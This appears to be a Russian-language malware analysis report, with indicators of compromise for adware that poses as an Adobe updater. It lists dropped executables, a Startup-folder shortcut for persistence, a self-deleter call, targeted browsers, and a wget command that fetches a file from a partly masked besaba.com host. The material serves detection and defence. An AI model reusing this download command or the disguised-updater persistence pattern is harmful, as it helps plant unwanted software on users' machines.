Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\adobe-updater.lnk
- '%TEMP%\setup-ads.exe'
- '%TEMP%\deleter.exe' /sfx=<Полный путь к вирусу>
- '%PROGRAM_FILES%\Adobe\adobe-updater.exe'
- '%PROGRAM_FILES%\Adobe\wget.exe' -cN --waitretry=3 -t3 -T10 "http://ad#####et.besaba.com/NDc2MztodHRwJTNBJTJGJTJGYWloZG93bmxvYWQuYWRvYmUuY29tJTJGYmluJTJGbGl2ZSUyRmluc3RhbGxfZmxhc2hwbGF5ZXIxMXgzMl9tc3NhX2FhYV9haWguZXhlO25hbWU9aW5zdGFsbF9mbGFzaHBsYXllcjExeDMyX21zc2FfYWFhX2FpaC5leGU7c2l6ZT0xMDQ4NTc2O3R5cGU9c2V0dXA="
- opera.exe
- chrome.exe
- firefox.exe
- %TEMP%\deleter.exe
- %TEMP%\nsm4.tmp\KillProc.dll
- %TEMP%\setup-ads-deleter.exe
- %TEMP%\setup-ads.exe
- %TEMP%\nsc2.tmp\System.dll
- %PROGRAM_FILES%\Adobe\adobe-updater.exe
- %PROGRAM_FILES%\Adobe\wget.exe
- %TEMP%\nsc2.tmp\System.dll
- DNS ASK ad#####et.besaba.com